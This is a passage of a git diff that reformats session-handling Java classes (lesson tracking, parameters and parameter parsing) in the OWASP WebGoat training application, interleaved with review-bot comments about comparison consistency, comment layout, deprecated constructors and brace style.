numVisits; - } - - - /** - * Gets the viewedCookies attribute of the LessonTracker object - * - * @return The viewedCookies value - */ - public boolean getViewedCookies() - { - return viewedCookies; - } - - - /** - * Gets the viewedHtml attribute of the LessonTracker object - * - * @return The viewedHtml value - */ - public boolean getViewedHtml() - { - return viewedHtml; - } - - - /** - * Gets the viewedLessonPlan attribute of the LessonTracker object - * - * @return The viewedLessonPlan value - */ - public boolean getViewedLessonPlan() - { - return viewedLessonPlan; - } - - - /** - * Gets the viewedParameters attribute of the LessonTracker object - * - * @return The viewedParameters value - */ - public boolean getViewedParameters() - { - return viewedParameters; - } - - - /** - * Gets the viewedSource attribute of the LessonTracker object - * - * @return The viewedSource value - */ - public boolean getViewedSource() - { - return viewedSource; - } - - - public boolean getViewedSolution() - { - return viewedSource; - } - - /** - * Description of the Method - */ - public void incrementNumVisits() - { - numVisits++; - } - - - /** - * Sets the properties attribute of the LessonTracker object - * - * @param props The new properties value - */ - protected void setProperties(Properties props, Screen screen) - { - completed = Boolean.valueOf( - props.getProperty(screen.getTitle() + ".completed")) - .booleanValue(); - maxHintLevel = Integer.parseInt(props.getProperty(screen.getTitle() - + ".maxHintLevel")); - numVisits = Integer.parseInt(props.getProperty(screen.getTitle() - + ".numVisits")); - viewedCookies = Boolean.valueOf( - props.getProperty(screen.getTitle() + ".viewedCookies")) - .booleanValue(); - viewedHtml = Boolean.valueOf( - props.getProperty(screen.getTitle() + ".viewedHtml")) - .booleanValue(); - viewedLessonPlan = Boolean.valueOf( - props.getProperty(screen.getTitle() + ".viewedLessonPlan")) - .booleanValue(); - viewedParameters = Boolean.valueOf( - 
props.getProperty(screen.getTitle() + ".viewedParameters")) - .booleanValue(); - viewedSource = Boolean.valueOf( - props.getProperty(screen.getTitle() + ".viewedSource")) - .booleanValue(); - } - - - public static String getUserDir(WebSession s) - { - return s.getContext().getRealPath("users") + "/"; - } - - - private static String getTrackerFile(WebSession s, String user, - Screen screen) - { - return getUserDir(s) + user + "." + screen.getClass().getName() - + ".props"; - } - - - /** - * Description of the Method - * - * @param screen Description of the Parameter - * @param s Description of the Parameter - * @return Description of the Return Value - */ - public static LessonTracker load(WebSession s, String user, Screen screen) - { - FileInputStream in = null; - try + /** + * Gets the completed attribute of the LessonTracker object + * + * @return The completed value + */ + public boolean getCompleted() { - String fileName = getTrackerFile(s, user, screen); - if (fileName != null) - { - Properties tempProps = new Properties(); - //System.out.println("Loading lesson state from: " + fileName); - in = new FileInputStream(fileName); - tempProps.load(in); - // allow the screen to use any custom properties it may have set - LessonTracker tempLessonTracker = screen - .createLessonTracker(tempProps); - tempLessonTracker.setProperties(tempProps, screen); - return tempLessonTracker; - } - } - catch (FileNotFoundException e) - { - // Normal if the lesson has not been accessed yet. 
- } - catch (Exception e) - { - System.out.println("Failed to load lesson state for " + screen); - e.printStackTrace(); - } - finally - { - try - { - in.close(); - } - catch (Exception e) - {} + return completed; } - return screen.createLessonTracker(); - } - - - /** - * Sets the completed attribute of the LessonTracker object - * - * @param completed The new completed value - */ - public void setCompleted(boolean completed) - { - this.completed = completed; - } - - - /** - * Sets the maxHintLevel attribute of the LessonTracker object - * - * @param maxHintLevel The new maxHintLevel value - */ - public void setMaxHintLevel(int maxHintLevel) - { - this.maxHintLevel = Math.max(this.maxHintLevel, maxHintLevel); - } - - - /** - * Sets the viewedCookies attribute of the LessonTracker object - * - * @param viewedCookies The new viewedCookies value - */ - public void setViewedCookies(boolean viewedCookies) - { - this.viewedCookies = viewedCookies; - } - - - /** - * Sets the viewedHtml attribute of the LessonTracker object - * - * @param viewedHtml The new viewedHtml value - */ - public void setViewedHtml(boolean viewedHtml) - { - this.viewedHtml = viewedHtml; - } - - - /** - * Sets the viewedLessonPlan attribute of the LessonTracker object - * - * @param viewedLessonPlan The new viewedLessonPlan value - */ - public void setViewedLessonPlan(boolean viewedLessonPlan) - { - this.viewedLessonPlan = viewedLessonPlan; - } - - - /** - * Sets the viewedParameters attribute of the LessonTracker object - * - * @param viewedParameters The new viewedParameters value - */ - public void setViewedParameters(boolean viewedParameters) - { - this.viewedParameters = viewedParameters; - } - - - /** - * Sets the viewedSource attribute of the LessonTracker object - * - * @param viewedSource The new viewedSource value - */ - public void setViewedSource(boolean viewedSource) - { - this.viewedSource = viewedSource; - } - - /** - * Sets the viewedSource attribute of the LessonTracker object - * - 
* @param viewedSource The new viewedSource value - */ - public void setViewedSolution(boolean viewedSolution) - { - this.viewedSolution = viewedSolution; - } - - /** - * Allows the storing of properties for the logged in and a screen. - * - * @param s Description of the Parameter - */ - public void store(WebSession s, Screen screen) - { - store(s, screen, s.getUserName()); - } - - - /** - * Allows the storing of properties for a user and a screen. - * - * @param s Description of the Parameter - */ - public void store(WebSession s, Screen screen, String user) - { - FileOutputStream out = null; - String fileName = getTrackerFile(s, user, screen); - //System.out.println( "Storing data to" + fileName ); - lessonProperties.setProperty(screen.getTitle() + ".completed", Boolean - .toString(completed)); - lessonProperties.setProperty(screen.getTitle() + ".maxHintLevel", - Integer.toString(maxHintLevel)); - lessonProperties.setProperty(screen.getTitle() + ".numVisits", Integer - .toString(numVisits)); - lessonProperties.setProperty(screen.getTitle() + ".viewedCookies", - Boolean.toString(viewedCookies)); - lessonProperties.setProperty(screen.getTitle() + ".viewedHtml", Boolean - .toString(viewedHtml)); - lessonProperties.setProperty(screen.getTitle() + ".viewedLessonPlan", - Boolean.toString(viewedLessonPlan)); - lessonProperties.setProperty(screen.getTitle() + ".viewedParameters", - Boolean.toString(viewedParameters)); - lessonProperties.setProperty(screen.getTitle() + ".viewedSource", - Boolean.toString(viewedSource)); - try + /** + * Gets the maxHintLevel attribute of the LessonTracker object + * + * @return The maxHintLevel value + */ + public int getMaxHintLevel() { - out = new FileOutputStream(fileName); - lessonProperties.store(out, s.getUserName()); - } - catch (Exception e) - { - // what do we want to do, I think nothing. 
- System.out.println("Warning User data for " + s.getUserName() - + " will not persist"); - } - finally - { - try - { - out.close(); - } - catch (Exception e) - {} + return maxHintLevel; } - } + /** + * Gets the numVisits attribute of the LessonTracker object + * + * @return The numVisits value + */ + public int getNumVisits() + { + return numVisits; + } + /** + * Gets the viewedCookies attribute of the LessonTracker object + * + * @return The viewedCookies value + */ + public boolean getViewedCookies() + { + return viewedCookies; + } - /** - * Description of the Method - * - * @return Description of the Return Value - */ - public String toString() - { - StringBuffer buff = new StringBuffer(); - buff.append("LessonTracker:" + "\n"); - buff.append(" - completed:.......... " + completed + "\n"); - buff.append(" - maxHintLevel:....... " + maxHintLevel + "\n"); - buff.append(" - numVisits:.......... " + numVisits + "\n"); - buff.append(" - viewedCookies:...... " + viewedCookies + "\n"); - buff.append(" - viewedHtml:......... " + viewedHtml + "\n"); - buff.append(" - viewedLessonPlan:... " + viewedLessonPlan + "\n"); - buff.append(" - viewedParameters:... " + viewedParameters + "\n"); - buff.append(" - viewedSource:....... " + viewedSource + "\n" + "\n"); - return buff.toString(); - } + /** + * Gets the viewedHtml attribute of the LessonTracker object + * + * @return The viewedHtml value + */ + public boolean getViewedHtml() + { + return viewedHtml; + } + /** + * Gets the viewedLessonPlan attribute of the LessonTracker object + * + * @return The viewedLessonPlan value + */ + public boolean getViewedLessonPlan() + { + return viewedLessonPlan; + } - /** - * @return Returns the lessonProperties. 
- */ - public Properties getLessonProperties() - { - return lessonProperties; - } + /** + * Gets the viewedParameters attribute of the LessonTracker object + * + * @return The viewedParameters value + */ + public boolean getViewedParameters() + { + return viewedParameters; + } + /** + * Gets the viewedSource attribute of the LessonTracker object + * + * @return The viewedSource value + */ + public boolean getViewedSource() + { + return viewedSource; + } - /** - * @param lessonProperties The lessonProperties to set. - */ - public void setLessonProperties(Properties lessonProperties) - { - this.lessonProperties = lessonProperties; - } + public boolean getViewedSolution() + { + return viewedSource; + } + + /** + * Description of the Method + */ + public void incrementNumVisits() + { + numVisits++; + } + + /** + * Sets the properties attribute of the LessonTracker object + * + * @param props + * The new properties value + */ + protected void setProperties(Properties props, Screen screen) + { + completed = Boolean.valueOf(props.getProperty(screen.getTitle() + ".completed")).booleanValue(); + maxHintLevel = Integer.parseInt(props.getProperty(screen.getTitle() + ".maxHintLevel")); + numVisits = Integer.parseInt(props.getProperty(screen.getTitle() + ".numVisits")); + viewedCookies = Boolean.valueOf(props.getProperty(screen.getTitle() + ".viewedCookies")).booleanValue(); + viewedHtml = Boolean.valueOf(props.getProperty(screen.getTitle() + ".viewedHtml")).booleanValue(); + viewedLessonPlan = Boolean.valueOf(props.getProperty(screen.getTitle() + ".viewedLessonPlan")).booleanValue(); + viewedParameters = Boolean.valueOf(props.getProperty(screen.getTitle() + ".viewedParameters")).booleanValue(); + viewedSource = Boolean.valueOf(props.getProperty(screen.getTitle() + ".viewedSource")).booleanValue(); + } + + public static String getUserDir(WebSession s) + { + return s.getContext().getRealPath("users") + "/"; + } + + private static String getTrackerFile(WebSession s, String user, 
Screen screen) + { + return getUserDir(s) + user + "." + screen.getClass().getName() + ".props"; + } + + /** + * Description of the Method + * + * @param screen + * Description of the Parameter + * @param s + * Description of the Parameter + * @return Description of the Return Value + */ + public static LessonTracker load(WebSession s, String user, Screen screen) + { + FileInputStream in = null; + try + { + String fileName = getTrackerFile(s, user, screen); + if (fileName != null) + { + Properties tempProps = new Properties(); + // System.out.println("Loading lesson state from: " + fileName); + in = new FileInputStream(fileName); + tempProps.load(in); + // allow the screen to use any custom properties it may have set + LessonTracker tempLessonTracker = screen.createLessonTracker(tempProps); + tempLessonTracker.setProperties(tempProps, screen); + return tempLessonTracker; + } + } catch (FileNotFoundException e) + { + // Normal if the lesson has not been accessed yet. + } catch (Exception e) + { + System.out.println("Failed to load lesson state for " + screen); + e.printStackTrace(); + } finally + { + try + { + in.close(); + } catch (Exception e) + { + } + } + + return screen.createLessonTracker(); + } + + /** + * Sets the completed attribute of the LessonTracker object + * + * @param completed + * The new completed value + */ + public void setCompleted(boolean completed) + { + this.completed = completed; + } + + /** + * Sets the maxHintLevel attribute of the LessonTracker object + * + * @param maxHintLevel + * The new maxHintLevel value + */ + public void setMaxHintLevel(int maxHintLevel) + { + this.maxHintLevel = Math.max(this.maxHintLevel, maxHintLevel); + } + + /** + * Sets the viewedCookies attribute of the LessonTracker object + * + * @param viewedCookies + * The new viewedCookies value + */ + public void setViewedCookies(boolean viewedCookies) + { + this.viewedCookies = viewedCookies; + } + + /** + * Sets the viewedHtml attribute of the LessonTracker object + 
* + * @param viewedHtml + * The new viewedHtml value + */ + public void setViewedHtml(boolean viewedHtml) + { + this.viewedHtml = viewedHtml; + } + + /** + * Sets the viewedLessonPlan attribute of the LessonTracker object + * + * @param viewedLessonPlan + * The new viewedLessonPlan value + */ + public void setViewedLessonPlan(boolean viewedLessonPlan) + { + this.viewedLessonPlan = viewedLessonPlan; + } + + /** + * Sets the viewedParameters attribute of the LessonTracker object + * + * @param viewedParameters + * The new viewedParameters value + */ + public void setViewedParameters(boolean viewedParameters) + { + this.viewedParameters = viewedParameters; + } + + /** + * Sets the viewedSource attribute of the LessonTracker object + * + * @param viewedSource + * The new viewedSource value + */ + public void setViewedSource(boolean viewedSource) + { + this.viewedSource = viewedSource; + } + + /** + * Sets the viewedSource attribute of the LessonTracker object + * + * @param viewedSource + * The new viewedSource value + */ + public void setViewedSolution(boolean viewedSolution) + { + this.viewedSolution = viewedSolution; + } + + /** + * Allows the storing of properties for the logged in and a screen. + * + * @param s + * Description of the Parameter + */ + public void store(WebSession s, Screen screen) + { + store(s, screen, s.getUserName()); + } + + /** + * Allows the storing of properties for a user and a screen. 
+ * + * @param s + * Description of the Parameter + */ + public void store(WebSession s, Screen screen, String user) + { + FileOutputStream out = null; + String fileName = getTrackerFile(s, user, screen); + // System.out.println( "Storing data to" + fileName ); + lessonProperties.setProperty(screen.getTitle() + ".completed", Boolean.toString(completed)); + lessonProperties.setProperty(screen.getTitle() + ".maxHintLevel", Integer.toString(maxHintLevel)); + lessonProperties.setProperty(screen.getTitle() + ".numVisits", Integer.toString(numVisits)); + lessonProperties.setProperty(screen.getTitle() + ".viewedCookies", Boolean.toString(viewedCookies)); + lessonProperties.setProperty(screen.getTitle() + ".viewedHtml", Boolean.toString(viewedHtml)); + lessonProperties.setProperty(screen.getTitle() + ".viewedLessonPlan", Boolean.toString(viewedLessonPlan)); + lessonProperties.setProperty(screen.getTitle() + ".viewedParameters", Boolean.toString(viewedParameters)); + lessonProperties.setProperty(screen.getTitle() + ".viewedSource", Boolean.toString(viewedSource)); + try + { + out = new FileOutputStream(fileName); + lessonProperties.store(out, s.getUserName()); + } catch (Exception e) + { + // what do we want to do, I think nothing. + System.out.println("Warning User data for " + s.getUserName() + " will not persist"); + } finally + { + try + { + out.close(); + } catch (Exception e) + { + } + } + + } + + /** + * Description of the Method + * + * @return Description of the Return Value + */ + public String toString() + { + StringBuffer buff = new StringBuffer(); + buff.append("LessonTracker:" + "\n"); + buff.append(" - completed:.......... " + completed + "\n"); + buff.append(" - maxHintLevel:....... " + maxHintLevel + "\n"); + buff.append(" - numVisits:.......... " + numVisits + "\n"); + buff.append(" - viewedCookies:...... " + viewedCookies + "\n"); + buff.append(" - viewedHtml:......... " + viewedHtml + "\n"); + buff.append(" - viewedLessonPlan:... 
" + viewedLessonPlan + "\n"); + buff.append(" - viewedParameters:... " + viewedParameters + "\n"); + buff.append(" - viewedSource:....... " + viewedSource + "\n" + "\n"); + return buff.toString(); + } + + /** + * @return Returns the lessonProperties. + */ + public Properties getLessonProperties() + { + return lessonProperties; + } + + /** + * @param lessonProperties + * The lessonProperties to set. + */ + public void setLessonProperties(Properties lessonProperties) + { + this.lessonProperties = lessonProperties; + } } diff --git a/main/project/JavaSource/org/owasp/webgoat/session/Parameter.java b/main/project/JavaSource/org/owasp/webgoat/session/Parameter.java index 7971ecf7b..7230af6c4 100644 --- a/main/project/JavaSource/org/owasp/webgoat/session/Parameter.java +++ b/main/project/JavaSource/org/owasp/webgoat/session/Parameter.java 
@@ -1,90 +1,81 @@ + package org.owasp.webgoat.session; -/******************************************************************************* +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. + * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. 
* * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ */ public class Parameter implements Comparable { - String name; + String name; - String value; + String value; - - public Parameter(String name, String value) - { - this.name = name; - this.value = value; - } - - - public String getName() - { - return name; - } - - - public String getValue() - { - return value; - } - - - //@Override - public boolean equals(Object obj) - { - if (obj instanceof Parameter) + public Parameter(String name, String value) { - Parameter other = (Parameter) obj; - return (name.equals(other.getName()) && value.equals(other - .getValue())); + this.name = name; + this.value = value; } - return false; - } + public String getName() + { + return name; + } - //@Override - public int hashCode() - { - return toString().hashCode(); - } + public String getValue() + { + return value; + } + // @Override + public boolean equals(Object obj) + { + if (obj instanceof Parameter) + { + Parameter other = (Parameter) obj; + return (name.equals(other.getName()) && value.equals(other.getValue())); + } + return false; + } - //@Override - public String toString() - { - return (name + "=" + value); - } + // @Override + public int hashCode() + { + return toString().hashCode(); + } + // @Override + public String toString() + { + return (name + "=" + value); + } - public int compareTo(Object o) - { - return toString().compareTo(o.toString()); - } + public int compareTo(Object o) + { + return toString().compareTo(o.toString()); + } } diff --git a/main/project/JavaSource/org/owasp/webgoat/session/ParameterNotFoundException.java b/main/project/JavaSource/org/owasp/webgoat/session/ParameterNotFoundException.java index ee14a37b1..0822fdbe3 100644 
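Review bot: `compareTo` on the new side still orders by `toString()` of an arbitrary `Object`, so it is not consistent with `equals`: `new Parameter("a=b", "c")` and `new Parameter("a", "b=c")` both stringify to `a=b=c`, compare as 0 and share a hash code, yet `equals` returns false for them. Because the class implements raw `Comparable`, a non-Parameter argument is also silently compared by its string form instead of failing with `ClassCastException`. Implementing `Comparable<Parameter>` and comparing the fields in order fixes both: `public int compareTo(Parameter o) { int c = name.compareTo(o.name); return c != 0 ? c : value.compareTo(o.value); }`. `equals` additionally dereferences `name` and `value` without a null guard, so a Parameter built with a null name throws instead of returning false; `Objects.equals` on each field would avoid that.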
--- a/main/project/JavaSource/org/owasp/webgoat/session/ParameterNotFoundException.java +++ b/main/project/JavaSource/org/owasp/webgoat/session/ParameterNotFoundException.java 
@@ -1,62 +1,59 @@ + package org.owasp.webgoat.session; -/******************************************************************************* +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. + * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. 
* * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ - * + * * @author Jeff Williams Aspect Security */ public class ParameterNotFoundException extends Exception { - /** + /** * */ private static final long serialVersionUID = 3286112913299408382L; + /** + * Constructs a new ParameterNotFoundException with no detail message. + */ + public ParameterNotFoundException() + { + super(); + } /** - * Constructs a new ParameterNotFoundException with no detail message. - */ - public ParameterNotFoundException() - { - super(); - } - - - /** - * Constructs a new ParameterNotFoundException with the specified detail - * message. - * - *@param s the detail message - */ - public ParameterNotFoundException(String s) - { - super(s); - } + * Constructs a new ParameterNotFoundException with the specified detail message. + * + * @param s + * the detail message + */ + public ParameterNotFoundException(String s) + { + super(s); + } } diff --git a/main/project/JavaSource/org/owasp/webgoat/session/ParameterParser.java b/main/project/JavaSource/org/owasp/webgoat/session/ParameterParser.java index abb3f6bf6..96c5c2026 100644 --- a/main/project/JavaSource/org/owasp/webgoat/session/ParameterParser.java +++ b/main/project/JavaSource/org/owasp/webgoat/session/ParameterParser.java 
@@ -1,40 +1,38 @@ + package org.owasp.webgoat.session; import java.util.Enumeration; import java.util.StringTokenizer; import java.util.Vector; import java.util.regex.Pattern; - import javax.servlet.ServletRequest; - import org.owasp.webgoat.util.HtmlEncoder; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ * @@ -44,15 +42,14 @@ public class ParameterParser { private final static String ALLOWED_CHARACTERS = "$()-?.@!,:;=//+"; // Don't - // allow - // #& - // specifically + // allow + // #& + // specifically private ServletRequest request; /** - * Constructs a new ParameterParser to handle the parameters of the given - * request. + * Constructs a new ParameterParser to handle the parameters of the given request. * * @param request * the servlet request @@ -80,7 +77,8 @@ public class ParameterParser if (Character.isLetterOrDigit(c) || Character.isWhitespace(c) || (ALLOWED_CHARACTERS.indexOf(c) != -1)) { clean.append(c); - } else + } + else { clean.append('.'); } @@ -104,8 +102,8 @@ public class ParameterParser } /** - * Gets the named parameter value as a boolean, with a default. Returns the - * default value if the parameter is not found. + * Gets the named parameter value as a boolean, with a default. Returns the default value if the + * parameter is not found. * * @param name * the parameter name @@ -118,8 +116,7 @@ public class ParameterParser try { return getBooleanParameter(name); - } - catch (Exception e) + } catch (Exception e) { return def; } @@ -141,8 +138,7 @@ public class ParameterParser try { return new Boolean(getSubParameter(first, next)).booleanValue(); - } - catch (Exception e) + } catch (Exception e) { return def; } 
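Review bot: The trailing comment on the `ALLOWED_CHARACTERS` declaration has been broken by the formatter into four fragments (`// Don't`, `// allow`, `// #&`, `// specifically`), and this hunk only re-indents the fragments instead of restoring the sentence. Put the note on its own line above the field so the formatter cannot split it again: `// Don't allow '#' and '&' specifically` followed by the unchanged declaration. Since the constant appears to be the only statement of which characters survive cleaning (the loop in the `@@ -80` hunk replaces everything else with '.'), a one-line comment there saying so would also help the next reader.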
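Review bot: `return new Boolean(getSubParameter(first, next)).booleanValue();` boxes a Boolean only to unbox it on the same line; the `Boolean(String)` constructor is deprecated in later JDKs and `return Boolean.parseBoolean(getSubParameter(first, next));` expresses the same parse directly. The enclosing method's signature and Javadoc lie outside this hunk, so the change is limited to that one statement.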
@@ -165,9 +161,8 @@ public class ParameterParser } /** - * Gets the named parameter value as a byte, with a default. Returns the - * default value if the parameter is not found or cannot be converted to a - * byte. + * Gets the named parameter value as a byte, with a default. Returns the default value if the + * parameter is not found or cannot be converted to a byte. * * @param name * the parameter name @@ -180,8 +175,7 @@ public class ParameterParser try { return getByteParameter(name); - } - catch (Exception e) + } catch (Exception e) { return def; } @@ -203,15 +197,16 @@ public class ParameterParser if (param.length() == 0) { throw new ParameterNotFoundException(name + " is empty string"); - } else + } + else { return (param.charAt(0)); } } /** - * Gets the named parameter value as a char, with a default. Returns the - * default value if the parameter is not found. + * Gets the named parameter value as a char, with a default. Returns the default value if the + * parameter is not found. * * @param name * the parameter name @@ -224,8 +219,7 @@ public class ParameterParser try { return getCharParameter(name); - } - catch (Exception e) + } catch (Exception e) { return def; } @@ -262,8 +256,7 @@ public class ParameterParser try { return getClassNameParameter(name); - } - catch (Exception e) + } catch (Exception e) { return def; } @@ -286,8 +279,8 @@ public class ParameterParser } /** - * Gets the named parameter value as a double, with a default. Returns the - * default value if the parameter is not found. + * Gets the named parameter value as a double, with a default. Returns the default value if the + * parameter is not found. * * @param name * the parameter name @@ -300,8 +293,7 @@ public class ParameterParser try { return getDoubleParameter(name); - } - catch (Exception e) + } catch (Exception e) { return def; } 
@@ -324,8 +316,8 @@ public class ParameterParser } /** - * Gets the named parameter value as a float, with a default. Returns the - * default value if the parameter is not found. + * Gets the named parameter value as a float, with a default. Returns the default value if the + * parameter is not found. * * @param name * the parameter name @@ -338,16 +330,15 @@ public class ParameterParser try { return getFloatParameter(name); - } - catch (Exception e) + } catch (Exception e) { return def; } } /** - * Gets the named parameter value as an IP String, with a default. Returns - * the default value if the parameter is not found or is the empty string. + * Gets the named parameter value as an IP String, with a default. Returns the default value if + * the parameter is not found or is the empty string. * * @param name * the parameter name @@ -360,8 +351,7 @@ public class ParameterParser try { return getIPParameter(name); - } - catch (Exception e) + } catch (Exception e) { return def; } @@ -372,8 +362,7 @@ public class ParameterParser * * @param name * the parameter name - * @return the parameter value as a valid IP String or an Empty string if - * invalid + * @return the parameter value as a valid IP String or an Empty string if invalid * @exception ParameterNotFoundException * if the parameter was not found or was the empty string */ @@ -386,10 +375,12 @@ public class ParameterParser if (values == null) { throw new ParameterNotFoundException(name + " not found"); - } else if (values[0].length() == 0) + } + else if (values[0].length() == 0) { throw new ParameterNotFoundException(name + " was empty"); - } else + } + else { // trim illegal characters value = clean(values[0].trim()); @@ -430,15 +421,15 @@ public class ParameterParser { valid = false; } - } - catch (Exception e) + } catch (Exception e) { valid = false; } octetCount++; } - } else + } + else { // Not a valid IP valid = false; 
@@ -472,8 +463,8 @@ public class ParameterParser } /** - * Gets the named parameter value as a int, with a default. Returns the - * default value if the parameter is not found. + * Gets the named parameter value as a int, with a default. Returns the default value if the + * parameter is not found. * * @param name * the parameter name @@ -486,8 +477,7 @@ public class ParameterParser try { return getIntParameter(name); - } - catch (Exception e) + } catch (Exception e) { return def; } @@ -510,8 +500,8 @@ public class ParameterParser } /** - * Gets the named parameter value as a long, with a default. Returns the - * default value if the parameter is not found. + * Gets the named parameter value as a long, with a default. Returns the default value if the + * parameter is not found. * * @param name * the parameter name @@ -524,16 +514,15 @@ public class ParameterParser try { return getLongParameter(name); - } - catch (Exception e) + } catch (Exception e) { return def; } } /** - * Determines which of the required parameters were missing from the - * request. Returns null if all the parameters are present. + * Determines which of the required parameters were missing from the request. Returns null if + * all the parameters are present. * * @param requestuired * Description of the Parameter @@ -556,7 +545,8 @@ public class ParameterParser if (missing.size() == 0) { return null; - } else + } + else { String[] ret = new String[missing.size()]; missing.copyInto(ret); @@ -572,10 +562,7 @@ public class ParameterParser */ public Enumeration getParameterNames() { - if (request == null) - { - return (null); - } + if (request == null) { return (null); } return request.getParameterNames(); } @@ -589,10 +576,7 @@ public class ParameterParser */ public String[] getParameterValues(String name) { - if (request == null) - { - return (null); - } + if (request == null) { return (null); } return request.getParameterValues(name); } 
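Review bot: The reflowed `if (request == null) { return (null); }` collapses a braced guard onto one line, while every other block in this commit is laid out in Allman style with braces on their own lines (compare the `else` blocks split apart in the same file), so the formatter's short-block setting now produces two brace styles in one file. The same single-line form appears in the `@@ -634` hunk of the next chunk and in the `@@ -780` and `@@ -803` hunks of getSubParameter; whichever form is chosen should be applied consistently, otherwise future diffs of these guards stay noisy. Returning `(null)` from a method typed `Enumeration` also pushes a null check onto every caller; `new Vector().elements()` (Vector is already imported) or `Collections.emptyEnumeration()` on Java 7+ would give callers an empty sequence instead.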
@@ -611,8 +595,7 @@ public class ParameterParser try { return getRawParameter(name); - } - catch (Exception e) + } catch (Exception e) { return def; } @@ -634,10 +617,8 @@ public class ParameterParser if (values == null) { throw new ParameterNotFoundException(name + " not found"); - } else if (values[0].length() == 0) - { - throw new ParameterNotFoundException(name + " was empty"); } + else if (values[0].length() == 0) { throw new ParameterNotFoundException(name + " was empty"); } return (values[0]); } @@ -659,8 +640,8 @@ public class ParameterParser } /** - * Gets the named parameter value as a short, with a default. Returns the - * default value if the parameter is not found. + * Gets the named parameter value as a short, with a default. Returns the default value if the + * parameter is not found. * * @param name * the parameter name @@ -673,8 +654,7 @@ public class ParameterParser try { return getShortParameter(name); - } - catch (Exception e) + } catch (Exception e) { return def; } @@ -697,10 +677,12 @@ public class ParameterParser if (values == null) { throw new ParameterNotFoundException(name + " not found"); - } else if (values[0].length() == 0) + } + else if (values[0].length() == 0) { throw new ParameterNotFoundException(name + " was empty"); - } else + } + else { // trim illegal characters value = clean(values[0].trim()); @@ -716,8 +698,8 @@ public class ParameterParser } /** - * Gets the named parameter value as a String, with a default. Returns the - * default value if the parameter is not found or is the empty string. + * Gets the named parameter value as a String, with a default. Returns the default value if the + * parameter is not found or is the empty string. * * @param name * the parameter name @@ -730,8 +712,7 @@ public class ParameterParser try { return getStringParameter(name); - } - catch (Exception e) + } catch (Exception e) { return def; } 
